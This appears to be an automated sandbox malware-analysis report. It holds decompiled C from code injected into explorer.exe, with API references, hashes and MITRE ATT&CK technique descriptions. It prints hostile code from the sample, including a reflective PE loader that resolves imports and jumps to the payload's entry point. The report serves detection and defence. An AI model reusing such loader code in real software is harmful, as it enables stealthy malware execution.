						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E000D4C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E000D5D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E000D4AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

0x000d2d76
0x000d2d7b
0x000d2d7f
0x000d2d82
0x000d2d82
0x000d2d85
0x000d2d8a
0x000d2d8f
0x000d2d92
0x000d2d97
0x000d2d9a
0x000d2da0
0x000d2da0
0x000d2dab
0x000d2dae
0x000d2db5
0x000d2dba
0x00000000
0x00000000
0x000d2dc0
0x000d2dc5
0x000d2dc5
0x000d2dca
0x000d2dd0
0x000d2dda
0x000d2ddf
0x000d2de5
0x000d2e04
0x000d2e07
0x000d2e12
0x000d2e12
0x000d2e12
0x000d2e09
0x000d2e09
0x000d2e0b
0x00000000
0x000d2e0d
0x000d2e0d
0x000d2e0d
0x000d2e0b
0x000d2e1a
0x000d2e1f
0x000d2e24
0x000d2e2a
0x000d2e2e
0x000d2e31
0x000d2e34
0x000d2e3a
0x000d2e3f
0x000d2e42
0x000d2e48
0x000d2e4d
0x000d2e53
0x000d2e59
0x000d2e5e
0x000d2e61
0x000d2e66
0x000d2e6a
0x000d2e6e
0x000d2e71
0x000d2e74
0x000d2e7d
0x000d2e84
0x000d2e87
0x000d2e8a
0x000d2e8f
0x000d2e94
0x000d2e97
0x000d2e9a
0x000d2e9a
0x000d2e9e
0x000d2ea7
0x000d2eae
0x000d2eb1
0x000d2eb6
0x000d2ebb
0x000d2ebb
0x000d2ebe
0x000d2ec3
0x00000000
0x00000000
0x000d2de7
0x000d2de9
0x000d2df6
0x00000000
0x00000000
0x000d2df6
0x000d2de9
0x00000000
0x000d2de5
0x000d2ec9
0x000d2ece
0x000d2ed1
0x000d2ed4
0x000d2f7f
0x000d2f7f
0x000d2eda
0x000d2eda
0x000d2eda
0x000d2edf
0x000d2f09
0x000d2f0c
0x000d2f0c
0x000d2f11
0x000d2f13
0x000d2f15
0x000d2f18
0x000d2f1b
0x000d2f23
0x000d2f28
0x000d2f28
0x000d2f2e
0x000d2f31
0x000d2f34
0x000d2f37
0x000d2f39
0x000d2f39
0x000d2f3a
0x000d2f3a
0x000d2f37
0x000d2f48
0x000d2f4b
0x000d2f4f
0x000d2f54
0x000d2f57
0x000d2f5a
0x000d2f5a
0x000d2f5a
0x000d2f5d
0x000d2f5d
0x000d2f60
0x000d2f60
0x000d2ee1
0x000d2ee1
0x000d2ef1
0x000d2ef4
0x000d2ef9
0x000d2ef9
0x000d2efc
0x000d2eff
0x000d2f02
0x000d2f04
0x000d2f04
0x000d2f63
0x000d2f65
0x000d2f68
0x000d2f68
0x000d2f6e
0x000d2f72
0x000d2f75
0x000d2f77
0x000d2f77
0x000d2f88
0x000d2f8a
0x000d2f8a
0x000d2f92
0x000d2fa0
0x000d2fa3
0x000d2fa5
0x000d2fc5
0x000d2fc5
0x000d2fc8
0x000d2fce
0x000d2fcf
0x000d2fd2
0x000d2fd4
0x000d2fd7
0x000d2fda
0x000d2fdd
0x000d2fe1
0x000d2fe4
0x000d2fe7
0x000d2fea
0x000d2fec
0x000d2fec
0x000d2fef
0x000d2ff1
0x000d2ff1
0x000d2ff4
0x000d2ff6
0x000d2ff9
0x000d3001
0x000d3004
0x000d3009
0x000d3009
0x000d300f
0x000d3012
0x000d3015
0x000d3017
0x000d3017
0x000d3018
0x000d3018
0x000d3023
0x000d3023
0x000d3023
0x000d3026
0x000d3029
0x000d3029
0x000d302c
0x000d302c
0x000d2fef
0x000d302f
0x000d3032
0x000d3035
0x000d3037
0x000d303a
0x000d303c
0x000d303f
0x000d3042
0x000d3044
0x000d3047
0x000d304f
0x000d3057
0x000d305a
0x000d305a
0x000d305a
0x000d305d
0x000d305d
0x000d305d
0x000d3060
0x000d3066
0x000d3068
0x000d3068
0x000d306e
0x000d3074
0x000d307d
0x000d3084
0x000d3086
0x000d3089
0x000d3089
0x000d308c
0x000d308c
0x000d308f
0x000d3091
0x000d3094
0x000d3096
0x000d30b1
0x000d30b1
0x000d30b5
0x000d30b8
0x000d30bb
0x000d30be
0x000d30d4
0x000d30d4
0x000d30d4
0x000d30c0
0x000d30c0
0x000d30c2
0x000d30c6
0x000d30c9
0x00000000
0x000d30cb
0x000d30cb
0x000d30cd
0x00000000
0x000d30cf
0x000d30cf
0x000d30cf
0x000d30cd
0x000d30c9
0x000d30d8
0x000d30db
0x000d30e0
0x000d30ea
0x000d30ea
0x000d30ea
0x000d30ed
0x000d3098
0x000d3098
0x000d309a
0x000d30a1
0x000d30a1
0x000d30a3
0x000d30a5
0x000d30a7
0x000d30ab
0x000d30ad
0x000d30af
0x00000000
0x00000000
0x000d30af
0x000d30ab
0x000d309c
0x000d309c
0x000d309f
0x00000000
0x00000000
0x000d309f
0x000d309a
0x000d30f7
0x000d30f9
0x000d30f9
0x000d3104
0x000d2fa7
0x000d2fa7
0x000d2faa
0x00000000
0x000d2fac
0x000d2fac
0x000d2fae
0x000d2fb2
0x00000000
0x000d2fb4
0x000d2fb4
0x000d2fb4
0x000d2fb7
0x00000000
0x000d2fbb
0x000d2fc4
0x000d2fc4
0x000d2fb7
0x000d2fb2
0x000d2faa
0x000d2f96
0x000d2f9f
0x000d2f9f

APIs

memcpy.MSVCRT ref: 000D2E7D
memcpy.MSVCRT ref: 000D2EF4
memcpy.MSVCRT ref: 000D2F23
memcpy.MSVCRT ref: 000D2F4F
memcpy.MSVCRT ref: 000D3004

Part of subcall function 000D5D90: memcpy.MSVCRT ref: 000D5E6E

Part of subcall function 000D4AF0: memcpy.MSVCRT ref: 000D4B1A

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction ID: ada663c656bf4378222564d16f1058757340d539b71a268776186381d56c4217
Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction Fuzzy Hash: B4D11375600B009FCB64CF6DD8D496ABBE1FF98304B24892EE88AC7705D771E9448B65

Uniqueness

Uniqueness Score: -1.00%

Function 000D2AEC, Relevance: 6.2, APIs: 4, Instructions: 219
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E000D2AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}

0x000d2afb
0x000d2b01
0x000d2b0a
0x000d2b0d
0x000d2b10
0x00000000
0x000d2c01
0x000d2c05
0x000d2c07
0x000d2c15
0x000d2d33
0x000d2d3c
0x000d2d3f
0x000d2d43
0x000d2d49
0x000d2d51
0x000d2d51
0x000d2d59
0x00000000
0x000d2d64
0x000d2c1b
0x000d2c24
0x000d2c32
0x000d2c35
0x000d2c52
0x000d2c59
0x000d2c6b
0x000d2c6b
0x000d2c72
0x000d2c82
0x000d2c9a
0x000d2c84
0x000d2c8c
0x000d2c8c
0x000d2c9d
0x000d2ca1
0x000d2cb1
0x000d2cd4
0x000d2ce6
0x000d2cb3
0x000d2cc7
0x000d2cc7
0x000d2cf0
0x000d2d0c
0x000d2cf2
0x000d2d01
0x000d2d01
0x000d2d14
0x000d2d1d
0x000d2d1d
0x000d2d2b
0x00000000
0x000d2c74
0x000d2c76
0x00000000
0x000d2c76
0x000d2c72
0x00000000
0x000d2c35
0x000d2b18
0x000d2b26
0x000d2b2b
0x000d2b36
0x000d2b39
0x000d2b3d
0x000d2b3f
0x000d2b4f
0x000d2b58
0x000d2b61
0x000d2b69
0x000d2b72
0x000d2b7d
0x000d2b83
0x000d2b86
0x000d2b89
0x000d2b90
0x000d2b97
0x00000000
0x00000000
0x000d2ba2
0x000d2bb0
0x000d2bbb
0x000d2bc5
0x000d2bdd
0x000d2bea
0x000d2bea
0x000d2bc7
0x000d2bd2
0x000d2bd2
0x000d2bf1
0x000d2bf1
0x000d2bf9
0x000d2bf9
0x00000000

APIs

GetModuleHandleA.KERNEL32(?), ref: 000D2C4C
LoadLibraryA.KERNEL32(?), ref: 000D2C65
GetProcAddress.KERNEL32(00000000,890CC483), ref: 000D2CC1
GetProcAddress.KERNEL32(00000000,?), ref: 000D2CE0

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: a54a24278918fea252380e465b505e286e532335ad0441f8fdbb0e591644a7db
Instruction ID: 5402422793a648d839d8c1373124b4a30482a42bb4b40aad00deaa3b82b4c0c1
Opcode Fuzzy Hash: a54a24278918fea252380e465b505e286e532335ad0441f8fdbb0e591644a7db
Instruction Fuzzy Hash: 92A18A75A10209EFCB54CFA8C985AADBBF1FF08314F14845AE815EB361D774AA81CF64

Uniqueness

Uniqueness Score: -1.00%

Function 000C1C68, Relevance: 6.1, APIs: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E000C1C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0xde6dc; // 0x1e8
				_t13 = E000CA4BF(_t41, 0);
				while(_t13 < 0) {
					E000C980C( &_v28);
					_t43 =  *0xde6e0; // 0x0
					_t15 =  *0xde6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0xde684; // 0x14cf8f0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0xde6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0xde684; // 0x14cf8f0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0xde6dc; // 0x1e8
						__eflags = 0;
						_t13 = E000CA4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0xde6e8; // 0x14cfdb8
				_v28 = _t20;
				_t22 = E000CA6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0xde6d0, 0, 0, 2);
					E000C980C(0xde6e0);
					_t64 = E000C1A1B( &_v28, E000C1226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0xde760);
						_t51 = 0x27;
						E000C9F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0xde684; // 0x14cf8f0
				 *((intOrPtr*)(_t29 + 0x30))( *0xde6d0);
				_t48 =  *0xde6dc; // 0x1e8
				 *0xde6d0 = 0;
				E000CA4DB(_t48);
				E000C861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

0x000c1c68
0x000c1c75
0x000c1c77
0x000c1c7e
0x000c1ce4
0x000c1c8b
0x000c1c90
0x000c1c96
0x000c1c9b
0x000c1ca1
0x000c1ca3
0x000c1ca7
0x000c1d15
0x000c1d17
0x000c1d99
0x000c1d9f
0x000c1d9f
0x000c1ca9
0x000c1cb1
0x000c1cb1
0x000c1cbd
0x000c1cc3
0x000c1cc5
0x00000000
0x00000000
0x000c1cc7
0x000c1cd1
0x000c1cd7
0x000c1cdd
0x000c1cdf
0x00000000
0x000c1cdf
0x000c1cab
0x000c1caf
0x00000000
0x00000000
0x00000000
0x000c1caf
0x000c1cee
0x000c1cef
0x000c1cf0
0x000c1cf1
0x000c1cf2
0x000c1cf7
0x000c1d01
0x000c1d06
0x000c1d0e
0x000c1d29
0x000c1d2c
0x000c1d36
0x000c1d41
0x000c1d54
0x000c1d56
0x000c1d58
0x000c1d5a
0x000c1d5b
0x000c1d63
0x000c1d64
0x000c1d6a
0x000c1d10
0x000c1d10
0x000c1d10
0x000c1d6b
0x000c1d76
0x000c1d79
0x000c1d7f
0x000c1d85
0x000c1d90
0x000c1d97
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcca7391820195f4f259866b6a38c60cc864deeab22be1a77c0a141bdab91468
Instruction ID: f2db016a6e86ac95650e658f1212804d8919bf6c937486c21d9280327b646b79
Opcode Fuzzy Hash: fcca7391820195f4f259866b6a38c60cc864deeab22be1a77c0a141bdab91468
Instruction Fuzzy Hash: E731C732605244AFE354EF64EC85EAE77A9EB55390B10092FF901CB2E3DE38DC048766

Uniqueness

Uniqueness Score: -1.00%

Function 000C1B2D, Relevance: 6.1, APIs: 4, Instructions: 97
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E000C1B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0xde6f4; // 0x1e4
				_t12 = E000CA4BF(_t38, 0);
				while(_t12 < 0) {
					E000C980C( &_v28);
					_t40 =  *0xde700; // 0x0
					_t14 =  *0xde704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0xde684; // 0x14cf8f0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0xde6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0xde684; // 0x14cf8f0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0xde6f4; // 0x1e4
								__eflags = 0;
								_t12 = E000CA4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E000C980C(0xde700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0xde6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0xde6e8; // 0x14cfdb8
				_v28 = _t24;
				_t61 = E000C1A1B( &_v28, E000C131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0xde760);
					_t48 = 0x27;
					E000C9F06(_t48);
				}
				if(_v24 != 0) {
					E000C6890( &_v24);
				}
				_t26 =  *0xde684; // 0x14cf8f0
				 *((intOrPtr*)(_t26 + 0x30))( *0xde6ec);
				_t28 =  *0xde758; // 0x0
				 *0xde6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0xde6f4; // 0x1e4
				 *0xde758 =  !=  ? 1 : _t28;
				E000CA4DB(_t46);
				_t15 = _t61;
				goto L12;
			}

0x000c1b2d
0x000c1b33
0x000c1b41
0x000c1baf
0x000c1b4e
0x000c1b53
0x000c1b59
0x000c1b5e
0x000c1b64
0x000c1b66
0x000c1b6a
0x000c1c64
0x000c1c64
0x000c1b70
0x000c1b70
0x000c1b7c
0x000c1b7c
0x000c1b88
0x000c1b8e
0x000c1b90
0x00000000
0x000c1b92
0x000c1b92
0x000c1b9c
0x000c1ba2
0x000c1ba8
0x000c1baa
0x00000000
0x000c1baa
0x000c1b72
0x000c1b72
0x000c1b76
0x00000000
0x00000000
0x00000000
0x00000000
0x000c1b76
0x000c1b70
0x000c1c5d
0x000c1c63
0x000c1c63
0x000c1bb8
0x000c1bcc
0x000c1bcf
0x000c1bd9
0x000c1be5
0x000c1bef
0x000c1bf0
0x000c1bf1
0x000c1bf2
0x000c1bf7
0x000c1c00
0x000c1c04
0x000c1c06
0x000c1c07
0x000c1c0f
0x000c1c10
0x000c1c16
0x000c1c1b
0x000c1c21
0x000c1c21
0x000c1c26
0x000c1c31
0x000c1c34
0x000c1c3c
0x000c1c48
0x000c1c4b
0x000c1c51
0x000c1c56
0x000c1c5b
0x00000000

APIs

GetCurrentProcess.KERNEL32(000DE6EC,00000000,00000000,00000002), ref: 000C1BCC
GetCurrentThread.KERNEL32(00000000), ref: 000C1BCF
GetCurrentProcess.KERNEL32(00000000), ref: 000C1BD6
DuplicateHandle.KERNEL32 ref: 000C1BD9

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: Current$Process$DuplicateHandleThread
String ID:
API String ID: 3566409357-0
Opcode ID: 7432552202618214ff09496dd892babb79cb5ed6e1a56431ae5e527e25d11dc9
Instruction ID: 2b5b3560eca2b9c66e54fa8514e9480b8e1ea27dea2e81419eb01e222fcba38a
Opcode Fuzzy Hash: 7432552202618214ff09496dd892babb79cb5ed6e1a56431ae5e527e25d11dc9
Instruction Fuzzy Hash: C831A6716053419FE744FF64EC89EAE77A4EB55390B00456EF9018B2A3DA38DC04CB72

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
